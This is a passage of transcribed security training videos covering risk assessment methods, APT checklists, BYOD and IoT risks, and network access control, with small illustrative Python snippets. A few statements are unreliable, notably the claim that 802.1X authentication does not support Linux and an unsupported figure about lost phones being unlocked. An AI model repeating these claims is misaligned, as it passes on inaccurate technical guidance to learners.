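# Hypothetical example: a $200,000 server, 25% damaged per incident, one incident every 2 years.
sle = single_loss_expectancy(200_000, 0.25)   # 50,000 per incident
ale = annualized_loss_expectancy(sle, 0.5)    # 25,000 expected loss per year
print(f"SLE = ${sle:,.0f}, ALE = ${ale:,.0f}")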
Let's now look at the pros of qualitative and quantitative risk assessment methods.
Having considered both the methods, the question is which method to employ for
the risk assessment. Both the assessment methods have their own advantages and
disadvantages. Therefore, it becomes the responsibility of the risk management
team to decide which method they want to use. And that decision can only be made
based on the present objectives and resources.
Whatever approach the team uses, the goal is to determine the risk to the
organization so that the correct and cost-effective control measures can be deployed
to protect the important assets from various threats.
Now, if you look at the advantages, or pros, of qualitative risk assessment: it is simple to carry out, meaning it does not require any complex calculations and does not use statistical data. Since no mathematical equations are involved, the data that is generated has no statistical meaning, and no statistical data is used. Qualitative risk assessment also helps you focus on implementing controls by prioritizing time and resources.
Now let's look at the pros of quantitative risk assessment. It uses objective statistical data, as we just discussed: it applies formulas based on the annualized rate of occurrence, annual loss expectancy, and single loss expectancy, so when these formulas are used you get data suitable for objective statistical analysis. And because you have assigned a value to each asset and threat, the output is expressed in monetary terms.
Since you get the output in monetary value, it is easy to perform cost-benefit analysis. And because you can generate a monetary output and perform a cost-benefit analysis, it is also easy to communicate the results to senior management. [Video description begins] According to the slide, quantitative risk assessment is mainly good for cost and benefit analysis. [Video description ends]
Now if you look at qualitative versus quantitative, because qualitative risk
assessment does not give you statistical data, you might find it very difficult to
convince the management. On the other hand, this becomes a strength of the
quantitative risk assessment where the output is in the monetary value and you can
also do cost-benefit analysis. And therefore, it's easy for you to convince the
management.
Now let's look at the cons of qualitative and quantitative risk assessment. Qualitative risk assessment provides subjective results: because the inputs are scenario-based and drawn from the circumstances and opinions of members of the organization, the results you get are subjective.
There is no concrete input going in, so you get nothing but subjective results, and that is the biggest drawback of qualitative risk assessment. Because there is no statistical input and no monetary value used in any calculation, it does not give you an output that can serve as the basis for monetary investment on the security front.
It is also difficult to track risk management performance, as it is difficult to communicate the results objectively. Because nothing is expressed in monetary value, it does not allow you to do any kind of cost-benefit analysis. The results are quite subjective, and you may find it difficult to convince management based on them.
Let's now look at the disadvantages, or cons, of quantitative risk assessment. Because a lot of formulas are involved, the calculations are complex, and if you make one error in a calculation, the output is going to be incorrect. Therefore, you have to be very careful while calculating the values; only then will you arrive at the correct results.
And because there are a lot of statistical calculations involved, this type of risk assessment requires more time and effort.
There are several risk assessment methodologies available in the market, so let's look at some of them. The first one is NIST SP 800-30r1. NIST stands for National Institute of Standards and Technology, which publishes the SP 800-30r1 framework for risk assessment. It is a qualitative risk assessment methodology that was initially developed for U.S. federal information systems and organizations, and it was later adopted by various private organizations.
Then you have the CCTA Risk Analysis and Management Method, also known as CRAMM. It was developed by a U.K. government organization named CCTA, which stands for the Central Computer and Telecommunications Agency. This is also a qualitative method.
Then you come to Failure Modes and Effects Analysis, also known as FMEA. This framework was initially developed for hardware, and it is a qualitative risk assessment method. [Video description begins] The following information is displayed on screen: Failure Modes and Effects Analysis. [Video description ends]
The fourth one is the Facilitated Risk Analysis Process, known as FRAP, F-R-A-P. This method is specifically designed to save the organization money and time by allowing it to prescreen systems and processes to determine whether a risk assessment is required.
Then we have something known as OCTAVE, which stands for Operationally
Critical Threat, Asset, and Vulnerability Evaluation. This is an approach that is
used to assess the information security needs of an organization. Using OCTAVE,
you can tailor the risk assessment, security, and skill levels to meet the security
requirements.
Then you have another method called the Security Officers Management and Analysis Project, known as SOMAP. It provides a guide and a risk assessment tool for risk analysis, and it uses both qualitative and quantitative risk assessment.
Then you have something called Spanning Tree Analysis, which represents threats in a tree-like structure in which all possible threats are listed. Each branch represents a category of threats, such as physical or network, and each branch is then extended in the form of leaves. When the risk assessment is performed, leaves and branches that are not applicable to the current environment are pruned, and whatever is left is considered a risk and threat to the network or the systems.
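As a toy sketch of that pruning idea (the threat tree and exclusions below are made-up examples, not a standard catalog):

# Hypothetical threat tree: category -> list of candidate threats (the "leaves").
threat_tree = {
    "physical": ["theft of laptops", "flood in server room"],
    "network": ["DoS attack", "rogue Wi-Fi access point"],
    "wireless": ["bluetooth snooping"],
}

# Branches or leaves that do not apply to this environment (e.g., no wireless in use).
not_applicable = {"wireless": None, "physical": {"flood in server room"}}

remaining = {}
for category, leaves in threat_tree.items():
    if category in not_applicable and not_applicable[category] is None:
        continue  # prune the entire branch
    pruned = not_applicable.get(category) or set()
    kept = [leaf for leaf in leaves if leaf not in pruned]
    if kept:
        remaining[category] = kept

print(remaining)  # whatever is left is treated as the relevant threats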
Finally, you have something known as the Value at Risk, or VaR, methodology. It is a theoretical and quantitative measure used for measuring information security risks.
APT Checklists
[Video description begins] Topic title: APT Checklists. Your host for this session is
Ashish Chugh. [Video description ends]
Now let's talk about the APT checklist. First of all, there is no fixed method of defining an APT checklist; it is entirely up to you or your organization to define a specific one. The reason is that each organization's infrastructure differs from every other organization's, so there is no fixed checklist that can be used as a base for all organizations.
So you will have to define actions in the checklist that will be able to handle the
APT threat and the assets they can compromise. This means consider your network
scenario, consider its architecture, and see where all possible threats can occur.
Now based on that, you will have to come up with the checklist, how to mitigate
those threats, and accordingly, add those points in the checklist.
What do you gain by adding these points to the checklist? Later on, if the same checklist is used by another person in the organization, say another team member while you're on leave, that person should be able to identify what security checks have been put in place to handle an APT threat. There should be a six-step approach: prepare, identify, contain, eradicate, recover, and capture lessons learned.
Why are there six steps? These are the six steps used to handle a particular attack. In this scenario, let's assume an attack has happened. You have to prepare, you have to identify the attack, and you have to contain it if possible. Then you have to eradicate it and, finally, do the recovery part.
Let's assume some servers were infected with malware during the attack. You have to perform the recovery of those servers. And then come the lessons learned: at the end of the attack, after you have successfully recovered your infrastructure, what lessons have you learned? You have to write those points down so they become a lesson for other people who have not faced this particular attack.
That way they can understand how the attack happened, how you contained it, how you were able to eradicate it and perform recovery, and finally what lessons were learned. As we have already discussed, these checklists can be tailored by the organization based on its infrastructure and architecture; there is no need for every organization to use a single checklist.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of APT defenses and to learn how they play a key role in network security. We did this by covering the concept of APT defenses and APT defense best practices. We also covered examples of APT attacks, looked at some tools used in APTs, and finally learned about techniques for handling APT attacks. Coming up next, in our next course, we will move on to explore NACs and gateways, BYOD and IoT, and the importance of NACs in network security.
Information Security: NACs & Gateways
Learners will discover key features of network access control (NAC), the
importance of NAC in a network, various NAC elements, authentication, and its
implementation, in this 12-video course. Explore the risks and challenges
associated with BYOD—which means "bring your own device"—and IoT, which is
Internet of Things. You will begin the course by examining the security risks
introduced by BYOD and IoT, along with their preventive measures. You will then
explore the major challenges with BYOD in an organization. The next tutorial
defines NAC and the importance it has in a network. This leads into examining the
NAC architecture; the different features of NAC; and the impact of an improperly
configured NAC. You will learn about the various NAC elements; recall the best
practices of implementing NAC, and identify the key points for creating an
effective checklist for NAC security. In the final tutorial, learners will be asked to
list the NAC authentication methods.
Course Overview
[Video description begins] Topic title: Course Overview. Your presenter for this
course is Ashish Chugh. He is an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh, and I have more than 25 years of experience in IT infrastructure operations, software development, cybersecurity, and e-learning. In the past, I've worked in different capacities in the IT industry: as a quality assurance team leader, technical specialist, IT operations manager, delivery head for software development, and cybersecurity consultant.
I have a bachelor's degree in psychology and a diploma in systems management. My areas of expertise are IT operations and process management. I also hold various certifications, including Certified Network Defender, Certified Ethical Hacker, and Computer Hacking Forensic Investigator, as well as several Microsoft certifications: MCSE, MCSA, and MCP. I'm also a certified Lotus professional.
In this course, we will cover network access control, or NAC, and its importance in the security ecosystem. We will also cover different types of NACs and what they mean for security. Later in the course, we will learn about the features of NAC that apply to security, and then move on to understand the effect of an improperly configured NAC on a network ecosystem. We will also cover the complexities introduced by BYOD, which is bring your own device, and IoT, which is the Internet of Things. Finally, we will look at a checklist for effective NAC security configuration.
BYOD and IoT Security Risks
[Video description begins] Topic title: BYOD and IoT Security Risks. The presenter
is Ashish Chugh. [Video description ends]
Many organizations have adopted a policy of BYOD, which is bring your own device.
[Video description begins] Bring Your Own Device (BYOD). [Video description ends]
Under this policy, a user is allowed to bring their own device into the organization and connect it to the network to do their work. These BYOD devices can include laptops, smartphones, tablets, or any other portable device the user can carry. When an organization implements a BYOD policy, the device the user brings in is completely owned by the user, so the organization does not spend any money purchasing it; the user purchases and owns the device.
[Video description begins] BYOD Advantages. [Video description ends]
So, why would an organization want to implement BYOD? Of course, there are a lot of advantages. It increases proficiency and productivity; that is the first goal. Because the device is always with the user, proficiency and productivity go up. Second, the user is free to choose their own device; for a smartphone, it could be Android or iPhone, depending on what the user requires, and it is up to the user what type or brand of device they want to purchase. It cuts down the organization's costs, because the organization does not spend a single penny purchasing those devices; they are purchased by the users. It also increases flexibility for the user, because users can not only choose their own device but also opt for a certain configuration. And because users can carry their devices anywhere, they can respond to their office e-mails or messages at any point in time.
[Video description begins] BYOD Security Issues. [Video description ends]
Now, along with the advantages, BYOD also has certain security lapses or security issues. First of all, in most cases, these devices are unmanaged, which means the organization's IT team does not control them. They are entirely at the users' mercy, which can also lead to information leaks. Let's take an example: suppose you carry a smartphone with you that contains organizational data. If that smartphone gets stolen, you have lost not only the phone but also the confidential information on it. There is no guarantee that a user has an anti-malware app installed on the smartphone. If a user downloads a malicious app and then connects to the network, there is a chance that not only is the smartphone infected with the malware, but the malware also spreads to the network, leading to a malware attack on the network. We have already discussed that certain users will carry confidential information on their smartphones, tablets, or laptops. If any of these gets stolen, then you have lost that confidential information. Most users have both personal and business data on their laptop, smartphone, or tablet. There is no categorization or separation of data on these devices, which creates a big risk of information being stolen.
Now, let's look at the Internet of Things, or IoT. It is about connecting devices that were not connected earlier by any means. A microwave or even a car can be connected to other devices that have similar capabilities. With IoT, you are connecting people, processes, data, and things. Each of these devices is IP enabled. There is a certain amount of data that can be collected from these devices, and that can help you do a lot of analysis. And of course, because you are collecting data, the data you collect can be analyzed using big data techniques. If you have millions of data points, you can utilize big data; otherwise, you could use simpler methods, like querying the data in a database.
[Video description begins] IoT. [Video description ends]
Just a little while ago, we looked at four components of IoT – people, process, data, and things. Let's look at people first. IoT helps to connect people in a much better way, which means that using IoT devices, people can connect and communicate more effectively. It helps you deliver the right information to the right person or device at the right time. When we talk about things, these are physical devices that connect to the Internet and can share data with each other.
Then we come to the data: you can leverage data in a more useful way for decision making. So let's now look at some of the IoT security challenges. The first one is interoperability. Because there are no common standards, interoperability is a challenge: if two different vendors have come up with IoT solutions, will these solutions be able to talk to each other or not? That is always a question mark.
So, there is a need for some common standard which can bring interoperability
between the IoT devices. Then we come to privacy. Now, the data collected by the
IoT devices can be a point of concern. This is because these devices can collect
sensitive data from your home, business or public environments. Now, these
devices can sometimes collect data about individuals without their knowledge. So
therefore, if these devices get hacked or somebody captures the data that is flowing
into the IoT devices, the privacy of the users can be a big concern. Because the
privacy of the information is a concern, regulatory and legal issues arise. Now, who's responsible if there is data theft? Is it the implementer of the IoT device, or is it the manufacturer? The answer can be pretty complicated, because you don't know who is actually at fault in this scenario. Then come the implementation challenges. Because there is no interoperability between devices, if you go with one specific vendor, you are in a vendor lock-in situation. Your own existing infrastructure also has to be able to integrate the IoT devices. So, bringing IoT devices into your office or home environment can sometimes be pretty challenging.
Challenges with BYOD
[Video description begins] Topic title: Challenges with BYOD. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the challenges with BYOD. First of all, the biggest challenge is physical theft. If you have sensitive or confidential data, physical theft of these devices can cause a lot of harm. Secondly, because these are user-owned devices, there is hardly any IT security policy applied to them. Unless you use a solution like mobile device management, it is not possible to apply a security policy to these user devices. There is no clear acceptable usage policy that can be implemented. An acceptable usage policy defines the appropriate use of IT infrastructure within an organization.
Now, because the devices in BYOD are owned by the users, no clear acceptable usage policy applies. If you lose the mobile device, which could be a smartphone, tablet, or a laptop, then depending on the type of information on it, it could be really harmful for the organization to end up losing confidential or sensitive data on that mobile device. Most users also do not encrypt their mobile devices, whether smartphone, tablet, or laptop; they are simply left open. For anybody who finds a smartphone, there is roughly a 50-50 chance that the phone is unlocked, which means the person who finds it can easily get into the phone and extract whatever information he or she wants.
Another challenge with BYOD is that it is sometimes nearly impossible to do data recovery. If the phone is lost, there is no way you can recover the data from that phone. In fact, the majority of users will not implement any kind of security on their mobile devices. This means that you would probably not find anti-malware or antivirus applications, and you would not find a firewall activated. So, the security posture of these devices is missing. Where there is no security posture, or only minimal security implemented, there is no defense in depth.
Because these are user-owned devices, they are mostly not compliant with the organizational security policies. Another main challenge is when an employee leaves: because it is their own device, you don't know what they are carrying on that device. Let's take an example: a senior management official leaves the job, and that person has certain sensitive and confidential data on his or her mobile device. There is no guarantee that this person is going to delete that data before leaving the job. Most likely, the information is going to go with the employee.
NAC and Its Importance
[Video description begins] Topic title: NAC and Its Importance. The presenter is
Ashish Chugh. [Video description ends]
Many years back, there used to be only desktops, which means, only a known
desktop would connect to the network, and information was pretty much secure
with these desktops.
[Video description begins] Network Access Control (NAC). [Video description
ends]
However, over the years, things have changed. Being able to control who accesses what is where network access control, or NAC, steps in. NAC ensures that only known devices are allowed to connect to the network. Devices have to meet certain requirements before they can be given access to the network. Anything that is untrusted, or does not meet the network requirements, will not be able to connect if NAC exists on your network. It detects and profiles any device that is connecting to the network.
So there is a certain set of parameters that every device has to go through before NAC can trust it. And if NAC trusts it, then based on the permissions granted to that particular device, it will allow the device to access those elements, directories, or folders on the network. So let's assume you're connecting to a network and there is a NAC sitting on the network; it will not only check your compliance level, it will also ensure that there is an access control policy against which you are matched, and permissions will be granted accordingly.
Now, because there is only one NAC on the network and it is centralized, all the permissions for every user connecting to the network will be validated through NAC. And if they pass the compliance check, they'll be allowed to access that particular file, folder, device, or server on which they have access. Now, because the technology has advanced, NAC can be implemented within your network, or it could be cloud-based.
[Video description begins] NAC and Its Importance. [Video description ends]
Now, let's move ahead and see why NAC has all of a sudden become so important in a network environment. There is an increased number of wireless, IoT, and BYOD devices. You need something that can do some sort of policy enforcement and ensure that the devices connecting to the network are safe and secure. NAC has also become very important for certain regulatory compliance reasons. It can help you record many compliance-related issues with devices. These regulatory compliance frameworks, such as PCI DSS, ISO, and HIPAA, might have certain requirements where you need to keep compliance records. That is where NAC can help you. It can also help you protect against malware by limiting network access and scanning the network for common vulnerabilities and exposures.
Now, over the years, the number of cyber threats has increased phenomenally. That is partly because most organizations do not have any kind of control to limit their network use. If you have NAC in the picture, you can control where users can go and what kind of resources they can access once they get on the network. So you can do a lot of control work on the network and limit those cyber threats. Now, let's look at the need for NAC. First of all, it helps you do element detection: it has the capability to detect any new device that is trying to connect to the network. Then comes endpoint security assessment. NAC has the ability to assess whether the new device connecting to the network is compliant with the security policy of the organization.
Then comes authentication. NAC has the ability to authenticate each and every user accessing the network. It is irrelevant where they're authenticating from or which device they are using; every user is authenticated before being granted access to the network. Then comes remediation. What happens if a device attempting to connect to the network is found non-compliant by NAC? There is a system of quarantine that NAC follows. The device is put into a quarantine state, in which remediation servers ensure that the non-compliance issues on the device are fixed.
Then comes enforcement. If a device attempting to connect to the network is found to be non-compliant with the defined security policy, the NAC that exists on the network must restrict the device's access to the network. This means that until the device becomes fully compliant, it will not be able to access the network. Then comes authorization, which is the ability of NAC to verify users' access to network resources. This is done by verifying their compliance with the authorization scheme defined in the existing authorization system, which could be your Active Directory or a RADIUS server, and by enforcing identity-based policies in NAC.
Then comes monitoring. In this process, there is continuous monitoring of users, devices, and their sessions for any kind of suspicious activity.
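To tie these functions together, here is a minimal, illustrative sketch in Python of how a NAC admission decision might combine authentication, posture assessment, quarantine, and enforcement. All class and function names here are hypothetical and simplified for teaching purposes; real NAC products implement this logic inside their own proprietary engines.

    from dataclasses import dataclass

    @dataclass
    class DevicePosture:
        authenticated: bool        # did the user or device authenticate successfully?
        antivirus_up_to_date: bool
        patches_current: bool

    def admission_decision(posture: DevicePosture) -> str:
        """Return ALLOW, QUARANTINE, or DENY for a connecting device."""
        if not posture.authenticated:
            return "DENY"          # enforcement: unauthenticated devices are blocked
        if posture.antivirus_up_to_date and posture.patches_current:
            return "ALLOW"         # compliant devices get network access
        return "QUARANTINE"        # non-compliant devices go to remediation servers

    # Example: a device that authenticated but has stale antivirus is quarantined.
    print(admission_decision(DevicePosture(True, False, True)))   # QUARANTINE

The point of the sketch is only the order of the checks: authentication first, then compliance, with quarantine as the fallback for devices that need remediation.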
NAC Architecture
[Video description begins] Topic title: NAC Architecture. The presenter is Ashish
Chugh. [Video description ends]
Let's now look at the NAC architecture. As of now, there are no standards defined for NAC architecture. Different vendors have different proprietary architectures, but there is no fixed architecture that all vendors follow. Because these vendors have their own proprietary designs, each NAC works in a somewhat different way. So Microsoft has one NAC product and Cisco has another, but they work and behave a little differently. This becomes an issue because if you are trying to implement one NAC and there are certain devices on your network that are not compatible with that solution, it will become a problem.
So before implementing any kind of NAC, you must ensure that its architecture can be well integrated within your network, because no one has defined a common NAC architecture. The Trusted Network Connect, or TNC, architecture is right now in the proposed stage, but it has not been fully adopted by vendors like Microsoft or Cisco. Now, if you look at this particular exhibit, there are four components that are defined in the NAC architecture.
[Video description begins] The four key components defined in the NAC
architecture are Policy decision point, Network Access Requestor, Policy
enforcement point, and Network resources. [Video description ends]
Three of the key components are the ones that a device encounters when making a connection to the network. The fourth one is the network resources, which come into play after a device's access to the network has been approved. Then the network resources can be accessed, which could be a server on the network, a directory, a file, or a certain application. But to start with, there are only three key components: the network access requestor, the policy decision point, and the policy enforcement point.
Features of NAC
[Video description begins] Topic title: Features of NAC. The presenter is Ashish
Chugh. [Video description ends]
Let's now look at the features of NAC. First of all, there is endpoint integrity control. When a device attempts to connect to the network, NAC can test the device and figure out whether it is compliant or not. So the integrity of that particular device connecting to the network can be easily judged. And beyond that, once the device is found to be compliant, what that device does within the network can be easily monitored. NAC also has identity-based access control, which means the user has to be authenticated and authorized to access specific resources on the network, without which the user will have no access to the network.
Then comes guest access support. There is a certain level of guest access that you can define within NAC. NAC also performs centralized management, which means not only does it provide a real-time overview of what devices are connected and what their status is, it can also log what is happening on the network. And using centralized management, you can route unknown or non-compliant devices to a specific portion of the network or into a quarantine zone. Then, of course, one of the good features NAC now supports is BYOD device support, which means any device that is owned by the user can also be controlled by NAC. So there are a lot of things that can be done with BYOD devices using NAC. When you talk about authentication, NAC has the ability to authenticate each user who's accessing the network. No matter where they are authenticating from and what device they are using, it is irrelevant.
Then you also get user activity visibility. Whatever the user is doing on the network, you will be able to monitor it. Then comes quarantine control, which means any system that is found to be non-compliant can be moved into quarantine. Until those devices become compliant, they stay in the quarantine zone. Your organization may be adhering to certain compliance standards, which means compliance auditing is now a necessity for the organization. NAC helps you do compliance auditing, and it can check the record of each and every device. It can ensure that when a device connects to the network, it is checked for compliance against certain regulatory and compliance standards. And if the device is found to be compliant, then it is granted access.
Then we come to policy enforcement, which means NAC makes sure the devices on the network meet the organizational security policy, which includes not only software updates but also antivirus updates. And it ensures that the network is not compromised because of certain non-compliant devices. So policy enforcement happens on a continuous basis. Every device is checked as and when it connects to the network to ensure that there is no compliance issue that can cause a problem for the network.
Impact of Improperly Configured NAC
[Video description begins] Topic title: Impact of Improperly Configured NAC. The
presenter is Ashish Chugh. [Video description ends]
Let's now look at the impact of an improperly configured NAC. What happens if you have implemented NAC on a network and it is not properly configured? For example, anybody could spoof an IP address and bypass the NAC controls that are implemented. This could happen when a certain subnet or segment of your network is not required to authenticate, and its IP addresses are therefore exempted in NAC. Anybody who finds out the IP addresses or MAC addresses of these devices can then very easily bypass NAC.
Secondly, there are captive portals that are used for NAC authentication. If you do not enforce a complex password policy, simple passwords can be brute forced, and somebody can easily figure out what the passwords are. An improperly configured NAC can also lead to failed IP resolution for the client. For instance, if DHCP does not have enough IP addresses in its pool, it may lead to failed IP resolution, which means the client will not get an IP address and therefore may not be able to connect to the network. In some cases, there might be failed element detection in real time.
For instance, if devices are attempting to connect to the network and NAC is not able to figure out what type of devices are connecting, device authentication will fail. And similarly, if NAC does not know what devices are connected, it cannot defend against those devices, which means those devices may be allowed to access the network without any kind of authentication or authorization.
NAC Elements
[Video description begins] Topic title: NAC Elements. The presenter is Ashish
Chugh. [Video description ends]
Just a little while back, we looked at three key elements of NAC: the access requestor, the policy enforcement point (PEP), and the policy decision point (PDP). Going forward, let's look at each one of these elements and understand what its job function is. When you talk about the access requestor, it is the endpoint system that is attempting to connect to the network. Because it is a device attempting to connect, it is requesting access to the network.
Then comes the policy enforcement point, which is the component in NAC that either allows or blocks access for a particular access requestor. The policy enforcement point, or PEP, does not decide that on its own. It sends the request from the access requestor to the policy decision point, or PDP. This component of NAC acts as a verifier of the request: based on whether the request is compliant with the policies defined on the PDP, it will either allow or deny access, and based on that decision, the access requestor will either get access or be denied.
This particular exhibit shows the NAC elements. You have the access requestor, which puts in a request to the policy enforcement point, which simply forwards the request to the policy decision point, the PDP. Once the PDP verifies the access request, whether it grants or denies it, it will send the decision back to the policy enforcement point, which will, in turn, allow or deny access.
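As a rough illustration of this request flow, the following Python sketch models an access requestor sending a request to a PEP, which relays it to a PDP for a decision. The classes and the simple allow-list policy are hypothetical, purely to show the division of responsibilities; real PEPs and PDPs are network components, not Python objects.

    class PolicyDecisionPoint:
        """Decides whether an access request is allowed, based on a simple policy."""
        def __init__(self, trusted_devices):
            self.trusted_devices = set(trusted_devices)   # hypothetical allow-list policy

        def decide(self, device_id: str) -> bool:
            return device_id in self.trusted_devices

    class PolicyEnforcementPoint:
        """Does not decide on its own; forwards the request to the PDP and enforces its answer."""
        def __init__(self, pdp: PolicyDecisionPoint):
            self.pdp = pdp

        def handle_request(self, device_id: str) -> str:
            return "ACCESS GRANTED" if self.pdp.decide(device_id) else "ACCESS DENIED"

    # The access requestor is simply the endpoint asking for network access.
    pep = PolicyEnforcementPoint(PolicyDecisionPoint(trusted_devices=["laptop-042"]))
    print(pep.handle_request("laptop-042"))   # ACCESS GRANTED
    print(pep.handle_request("unknown-box"))  # ACCESS DENIED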
Best Practices of Implementing NAC
[Video description begins] Topic title: Best Practices of Implementing NAC. The
presenter is Ashish Chugh. [Video description ends]
We will now look at the best practices for implementing NAC. You should compare the existing NAC solutions and see which one of them suits your needs. So you have to compare them, weigh the pros and cons, and look at the advantages and disadvantages; accordingly, you should implement the solution. Now, going forward, let's assume that you have selected a solution; then you have to create a user baseline. You have to understand what your users do and what kind of devices you have, and put up a baseline against which users will be judged when they attempt to connect to the network.
Other than your normal users, you will also have guests that need to connect to your network. These could be contract staff, vendors, or certain visitors who come in, for example, to showcase a prototype and need to connect to your network. Now, you do not want them to access the entire network. You can put separate security controls in place for these guests so they have only limited access. When you implement NAC, you should also ensure that you are monitoring it continuously and watching its alerts, because NAC will generate alerts as and when it encounters something suspicious on the network, or it finds a device that is not behaving the way it should.
You should also perform regular network audits. Whether or not you have NAC on your network, you should do this activity on a regular basis. First of all, you have to gather information and see which solution fits best on your network. Once NAC is implemented, you have to start gathering information about your network: what devices are there, and what kind of policies you have to implement. Once you have done that, you should start the implementation, or rollout, of NAC with only a small group. You should not implement NAC on the entire network at once. This is because, if there are certain technical issues, only a small group will be impacted rather than the entire network.
When you start getting feedback from the users and can fix those technical issues, if there are any, then you can start implementing on the rest of the network, but don't do it in one go. After you've gathered feedback from the small group, you start rolling out your NAC on the rest of the network, but in incremental phases. Eventually, you will come to a point where you've covered the entire network; however, it was not done in one single go, it was done in phases. And because NAC solutions have several features, you may not want to implement all the features at once.
Go with incremental phases: implement a few features, test them out on a small group, then enable more features. Slowly and gradually, you will be able to implement all the features, but it will not be in one single go. This means you will require more time and it will take more effort, but the implementation will be much better and much more organized.
NAC Security Checklist
[Video description begins] Topic title: NAC Security Checklist. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the important points in the NAC security checklist. First of all, you need to have a policy. That policy is required so that you can enforce it on the devices that connect to the network. This policy needs to be defined based on your organization's IT security policy. Then comes authentication. You need to ensure that each user is authenticated before he or she connects to the network. You also have to ensure NAC is properly implemented in your network environment; basically, the integration has to be tightly coupled with other security solutions.
Then comes enforcement. When you talk about policy enforcement, this means checking whether the devices connecting to the network meet the IT security standards or not. This could include your software updates or antivirus updates. Then comes integration. You might have several security products already running on the network, and you will have Active Directory or some kind of LDAP environment. You have to ensure that you are able to integrate your NAC with those products and directory services so that you don't have to redo a lot of work, like creating users again. If you integrate NAC with the LDAP environment, which will most likely be Active Directory, the users already exist. So you should make sure you integrate it with Active Directory to take advantage of that.
NAC Authentication Methods
[Video description begins] Topic title: NAC Authentication Methods. The presenter
is Ashish Chugh. [Video description ends]
Let's now look at the various types of NAC authentication methods. There are primarily three types – web-based, proprietary client, and 802.1X. Going forward, we will be looking at each one of them in detail. When you talk about web-based authentication, it uses a captive portal to gather user information, which means the user needs to come to the captive portal and provide user credentials. Now, when a user connects to the captive portal, an IP address has already been given to the client before the user is authenticated; this means the user already has an IP address.
In the captive portal, the authentication method is pretty simple: it is only the user credentials, which consist of a username and password. Other methods can be implemented, but in most cases it is only the username and password. Once the user provides the username and password, NAC redirects the user to the authentication page, which could be backed by any of the authentication servers in the backend; it could be an LDAP server or a RADIUS server. This kind of method can be applied to various types of platforms, such as Linux and Windows.
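To make the flow concrete, here is a minimal, hypothetical Python sketch of the credential step a captive portal might perform. The verify_with_backend function is a stand-in for whatever LDAP or RADIUS lookup the real NAC product performs; it is not a real API, and the demo account data is invented for illustration only.

    def verify_with_backend(username: str, password: str) -> bool:
        """Stand-in for an LDAP or RADIUS lookup performed by the NAC backend."""
        demo_accounts = {"guest1": "S3cur3Pass!"}      # hypothetical demo data only
        return demo_accounts.get(username) == password

    def captive_portal_login(username: str, password: str) -> str:
        """The client already has an IP address; network access is granted only after this check."""
        if verify_with_backend(username, password):
            return "Authenticated: network access granted"
        return "Authentication failed: access restricted to the portal"

    print(captive_portal_login("guest1", "S3cur3Pass!"))
    print(captive_portal_login("guest1", "wrong"))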
Then comes the proprietary client authentication method. In this method, different vendors use different technologies. Most likely, they will have an agent application that is installed on the client systems. When the agent is installed on the client system, it provides tight integration between the client and the NAC system, based on your organizational security policy. The advantage of this particular method is that it can work with different kinds of network topologies; you are not tied to a specific topology. You can implement this kind of solution on virtually all the topologies that exist.
In most cases, NAC solutions that use the proprietary client authentication method, meaning they use an agent, are designed mostly for Windows. It is quite unlikely that you would find an agent-based NAC solution for Linux or macOS. And of course, if you have a proprietary client or an agent from a particular vendor, you are forced into a vendor lock-in situation. So, if tomorrow you have to change the NAC solution, you will have to uninstall the agent from all the systems on the network.
Now let's look at the 802.1X authentication method. Compared to the proprietary client or the captive portal, which is a web-based authentication method, this particular method provides a high level of security. This is because it is very tightly integrated within the network to authenticate users. It can support multiple protocols, which means you are not dependent on or forced to use one particular protocol; various protocols are supported. It is also supported by newer operating systems like Windows 10 and various other operating systems that are on the market as of now.
One of the biggest advantages of this particular method is that it can scale up to a really large number of clients. That means you are not tied to a specific number of clients; this method can scale up the NAC solution to a great extent. Now, having said this, one of the biggest disadvantages is that it does not provide support for Linux, embedded systems, and Symbian operating systems. That is the drawback. So if you have a Linux environment, you probably don't want to go with the 802.1X authentication method.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, our goal was to identify the importance of NAC and to learn how it plays a key role in network security. We did this by covering the effect of an improperly configured NAC. We also looked at the complexities introduced by BYOD and IoT, and at the different types of NAC.
Then we also covered the different features of NAC. And finally, we learned about the role of NAC in network security. Coming up next, in our next course, we will move on to explore subnetting and DNS, VMs and containers, and the importance of proper DNS configuration.
Information Security: Subnetting & DNS
for Security Architects
In this 11-video course, learners will discover key concepts related to subnetting, virtual machines (VMs), containers, and DNS (domain name system) security. Examine tips and tricks used in subnetting and subnetting advantages. Explore classless inter-domain routing (CIDR) notation, deployment and security considerations for VMs and containers, and types of DNS attacks and mitigation
strategies. You will begin the course by taking a look at the importance of
subnetting, how it relates to security, and its advantages and disadvantages. Then
move on to defining the CIDR notation. You will examine the subnetting cheat
sheet, and learn various subnetting tips and tricks; compare VMs and containers,
and examine the deployment considerations for VMs and containers. Next, learners
will observe the best practices for deploying VMs, and the best practices for VM
and container security. In the final two tutorials of this course, you will discover the
various types of DNS attacks and their mitigations, and the various types of
subnetting attacks and mitigations.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT infrastructure operations, software development, cybersecurity, and e-learning. [Video description begins] Your host for this session is Ashish Chugh. He
is an IT consultant. [Video description ends]
In the past, I have worked in different capacities in the IT industry. I've worked as a quality assurance team leader, technical specialist, IT operations manager, and delivery head for software development. Along with this, I've also worked as a cybersecurity consultant.
I have a bachelor's degree in psychology and a diploma in system management. My areas of expertise are IT operations and process management. I have various certifications, including Certified Network Defender, Certified Ethical Hacker, and Computer Hacking Forensic Investigator.
Other than these certifications, I also have a few certifications from Microsoft: MCSE, MCSA, and MCP. I'm also a Certified Lotus Professional.
In this course, you will understand the concept of subnetting and how it applies to
security. We will also cover tips and tricks on subnetting with security in mind.
Moving ahead, we will also cover the VMs, which are virtual machines, and
containers. And we will also see proper DNS configuration for security. Later on in
the course, we will look at common attacks that specifically apply to subnetting and
DNS and how to mitigate them.
Subnetting and its Advantages
[Video description begins] Topic title: Subnetting and its Advantages. Your host for
this session is Ashish Chugh. [Video description ends]
Let's understand the concept of subnetting – what subnetting is, why it is required, and why it is important. Consider an analogy where there is a large town that does not have any street or area markings. Now, if you have to deliver a courier or a letter within that town, how would you find the house where you need to deliver it? It would be virtually impossible; it would take multiple days for you to figure out where the address is and how to deliver the letter to it.
